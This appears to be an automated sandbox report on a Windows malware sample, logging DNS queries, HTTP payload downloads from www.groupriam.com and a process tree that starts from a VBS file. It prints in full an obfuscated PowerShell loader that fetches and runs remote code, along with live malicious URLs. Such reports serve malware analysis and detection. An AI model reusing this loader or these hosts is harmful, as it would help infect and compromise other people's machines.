                                                                      Oct 22, 2024 15:31:24.292563915 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.295893908 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.542098999 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.542129040 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:14.542196035 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.596060038 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:14.596081972 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.374336958 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.374409914 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.453305960 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.453340054 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.453697920 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.453759909 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.457273960 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.499344110 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.637907028 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.637983084 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.637990952 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.638037920 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.755270958 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755285978 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755330086 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755359888 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.755376101 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.755465031 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.872553110 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.872579098 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.872632980 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.872647047 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.872664928 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.872689009 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.989736080 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.989765882 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.989833117 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:15.989845991 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:15.991421938 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.107038975 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.107059956 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.107144117 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.107152939 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.107187986 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.223885059 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.223912001 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.223980904 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.223994017 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.224059105 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.341291904 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.341320992 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.341391087 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.341399908 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.341445923 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.458374023 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.458390951 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.458453894 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.458460093 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.458512068 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.501586914 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.501616001 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.501677990 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.501692057 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.501718998 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.501740932 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.618659019 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.618680954 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.618742943 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.618757010 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.618788004 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.618798971 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.693434954 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.693470001 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.693613052 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.693623066 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.693737030 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.810198069 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.810226917 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.810292959 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.810308933 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.810342073 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.810357094 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.895541906 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.895562887 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.895720005 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.895730972 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.897047043 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.970129967 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.970154047 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.970252037 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:16.970262051 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:16.970300913 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.057518005 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.057540894 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.057760954 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.057773113 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.057874918 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.161364079 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.161390066 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.161559105 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.161571026 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.161696911 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.204344034 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.204368114 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.204447985 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.204456091 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.204518080 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.292295933 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.292341948 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.292460918 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.292469978 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.292633057 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.364007950 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.364027977 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.364099026 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.364105940 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.364140034 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.438437939 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.438453913 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.438520908 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.438527107 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.438560963 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.512746096 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.512775898 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.512907028 CEST49988443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:32:17.512919903 CEST44349988199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:32:17.514182091 CEST49988443192.168.2.5199.103.62.205
Oct 22, 2024 15:32:17.526659012 CEST | 443 | 49988 | 199.103.62.205 | 192.168.2.5
Oct 22, 2024 15:32:17.526735067 CEST | 443 | 49988 | 199.103.62.205 | 192.168.2.5
Oct 22, 2024 15:32:17.526751041 CEST | 49988 | 443 | 192.168.2.5 | 199.103.62.205
Oct 22, 2024 15:32:17.526793957 CEST | 49988 | 443 | 192.168.2.5 | 199.103.62.205
Oct 22, 2024 15:32:17.526854038 CEST | 49988 | 443 | 192.168.2.5 | 199.103.62.205
Oct 22, 2024 15:32:17.526865959 CEST | 443 | 49988 | 199.103.62.205 | 192.168.2.5
Oct 22, 2024 15:33:07.659739971 CEST | 50003 | 80 | 192.168.2.5 | 199.59.243.227
Oct 22, 2024 15:33:07.665122986 CEST | 80 | 50003 | 199.59.243.227 | 192.168.2.5
Oct 22, 2024 15:33:07.665205002 CEST | 50003 | 80 | 192.168.2.5 | 199.59.243.227
Oct 22, 2024 15:33:07.672292948 CEST | 50003 | 80 | 192.168.2.5 | 199.59.243.227
Oct 22, 2024 15:33:07.677692890 CEST | 80 | 50003 | 199.59.243.227 | 192.168.2.5
Oct 22, 2024 15:33:08.302416086 CEST | 80 | 50003 | 199.59.243.227 | 192.168.2.5
Oct 22, 2024 15:33:08.302476883 CEST | 80 | 50003 | 199.59.243.227 | 192.168.2.5
Oct 22, 2024 15:33:08.302661896 CEST | 50003 | 80 | 192.168.2.5 | 199.59.243.227
Oct 22, 2024 15:33:08.302994967 CEST | 80 | 50003 | 199.59.243.227 | 192.168.2.5
Oct 22, 2024 15:33:08.303055048 CEST | 50003 | 80 | 192.168.2.5 | 199.59.243.227
Oct 22, 2024 15:33:08.306149006 CEST | 50003 | 80 | 192.168.2.5 | 199.59.243.227
Oct 22, 2024 15:33:08.311580896 CEST | 80 | 50003 | 199.59.243.227 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 15:31:17.011495113 CEST | 65419 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 15:31:17.027180910 CEST | 53 | 65419 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 15:31:20.474730968 CEST | 61890 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 15:31:20.549321890 CEST | 53 | 61890 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 15:33:07.529012918 CEST | 59087 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 15:33:07.653238058 CEST | 53 | 59087 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 15:31:17.011495113 CEST | 192.168.2.5 | 1.1.1.1 | 0xf168 | Standard query (0) | gormezl_6777.6777.6777.677e | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:31:20.474730968 CEST | 192.168.2.5 | 1.1.1.1 | 0x18bd | Standard query (0) | www.groupriam.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:33:07.529012918 CEST | 192.168.2.5 | 1.1.1.1 | 0xca58 | Standard query (0) | www.foundation-repair.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 15:31:17.027180910 CEST | 1.1.1.1 | 192.168.2.5 | 0xf168 | Name error (3) | gormezl_6777.6777.6777.677e | none | none | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:31:20.549321890 CEST | 1.1.1.1 | 192.168.2.5 | 0x18bd | No error (0) | www.groupriam.com | groupriam.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 15:31:20.549321890 CEST | 1.1.1.1 | 192.168.2.5 | 0x18bd | No error (0) | groupriam.com |  | 199.103.62.205 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:33:07.653238058 CEST | 1.1.1.1 | 192.168.2.5 | 0xca58 | No error (0) | www.foundation-repair.biz |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
• www.groupriam.com
• www.foundation-repair.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 50003 | 199.59.243.227 | 80 | 2576 | C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 15:33:07.672292948 CEST | 563 | OUT | GET /enra/?mxv=bBN4&XFtPf6=EuJScojaXV9tkcwLe9A6ZNdie4KkCxAOd2jPPlI8uN15nuMsourZ6RcE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzR3lGN8BbnO4B13xmkasr+DtvmANIh/JvA8i/3xstHKmsaw== HTTP/1.1
    Host: www.foundation-repair.biz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 22, 2024 15:33:08.302416086 CEST | 1236 | IN | HTTP/1.1 200 OK
    date: Tue, 22 Oct 2024 13:33:07 GMT
    content-type: text/html; charset=utf-8
    content-length: 1506
    x-request-id: 44f578de-996e-443a-9cbd-108e82ba86f8
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yV7ZIeh2FNb0qJFoZYuuW50+lBDt4N9KPKkfB7p7cP8+jIYbunUuB6qp8AXW4dq5bmQ44kmZexgkr0mpCrS0JQ==
    set-cookie: parking_session=44f578de-996e-443a-9cbd-108e82ba86f8; expires=Tue, 22 Oct 2024 13:48:08 GMT; path=/
    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49718 | 199.103.62.205 | 443 | 7156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 13:31:21 UTC | 176 | OUT | GET /Koalitioner.prx HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.groupriam.com
    Connection: Keep-Alive
2024-10-22 13:31:21 UTC | 422 | IN | HTTP/1.1 200 OK
    Connection: close
    content-type: application/octet-stream
    last-modified: Mon, 21 Oct 2024 13:43:55 GMT
    accept-ranges: bytes
    content-length: 494360
    date: Tue, 22 Oct 2024 13:31:21 GMT
    server: LiteSpeed
    vary: User-Agent
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49988 | 199.103.62.205 | 443 | 6640 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 13:32:15 UTC | 175 | OUT | GET /zkwqTJp58.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.groupriam.com
    Cache-Control: no-cache
2024-10-22 13:32:15 UTC | 422 | IN | HTTP/1.1 200 OK
    Connection: close
    content-type: application/octet-stream
    last-modified: Mon, 21 Oct 2024 13:36:38 GMT
    accept-ranges: bytes
    content-length: 336448
    date: Tue, 22 Oct 2024 13:32:15 GMT
    server: LiteSpeed
    vary: User-Agent
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                      Data Ascii: sV?U$y[}~-u'/G'S8&V^5SmY,aH$F~#XW63'ln[!G]zuR+H<b+B'PE#=W4eK%*T/gstApIx(D|o($+Tdl#HT4UGE(U
                                                                      2024-10-22 13:32:16 UTC444INData Raw: cb 9c 30 71 f7 ff 15 c6 f7 88 54 7f bf e9 6d 78 45 4b 5b 53 b2 9c 28 0f 16 82 6b c6 11 03 07 42 8f a6 80 ce eb 8c cd a0 e0 ed 78 67 fa a7 11 11 8a 9b 36 a9 eb 97 80 f6 cd 5b 1c b8 42 2c 71 cb db bb 61 c6 09 e2 9b cb 88 f2 d6 68 57 9b c1 5f e9 94 3f fb 4f 32 10 25 24 9e ab 56 d1 cc 1b c0 49 9b 82 6b 2c 40 f3 63 f3 68 2a ec cd 75 98 9c 4b 2e c1 72 76 2f 52 cf 21 82 25 cd 8e 8d 12 dc 2b 5e 10 ac 47 5e 8b 08 b0 bb 10 1b d7 e6 20 3b 24 1a bd 5b dd 17 62 eb 35 5c 0e 66 6a 46 9e 15 ea a2 ff 8e 6b 11 5a a0 10 01 06 1c 7b 26 97 4f fe 08 c7 b0 cc 9c 9c 17 3b 4d f2 a2 bf fa be bd eb 7c 73 c6 9d 9d 91 48 07 80 4c 91 7d 90 29 2a 15 c5 5e 31 5e 36 95 64 f2 d0 8e b0 16 9b 2f b6 51 35 80 b5 f4 f4 73 a0 b3 5e 31 9b 51 78 5d a2 4c b4 a2 3a 35 c9 50 1a 5a 2d a2 f9 76 38 36
                                                                      Data Ascii: 0qTmxEK[S(kBxg6[B,qahW_?O2%$VIk,@ch*uK.rv/R!%+^G^ ;$[b5\fjFkZ{&O;M|sHL})*^1^6d/Q5s^1Qx]L:5PZ-v86


                                                                      Target ID:0
                                                                      Start time:09:31:15
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs"
                                                                      Imagebase:0x7ff6ec390000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:09:31:15
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\PING.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:ping gormezl_6777.6777.6777.677e
                                                                      Imagebase:0x7ff7f6580000
                                                                      File size:22'528 bytes
                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:31:15
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:09:31:16
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. 
Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage 